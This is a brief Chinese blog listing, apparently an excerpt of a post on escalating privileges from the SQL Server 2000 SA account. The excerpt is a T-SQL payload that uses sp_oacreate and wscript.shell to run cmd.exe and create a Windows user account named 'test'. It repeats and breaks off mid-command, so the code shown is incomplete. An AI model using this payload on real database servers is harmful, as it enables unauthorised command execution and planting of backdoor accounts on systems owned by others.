sql server 2000 SA提权方法
摘要:declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod@shell,'run',null,'c:\windows\system32\cmd.exe /c net user test test'declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod@shell,'run',null,'c:\w
阅读全文
posted @ 2012-03-27 20:59
浙公网安备 33010602011771号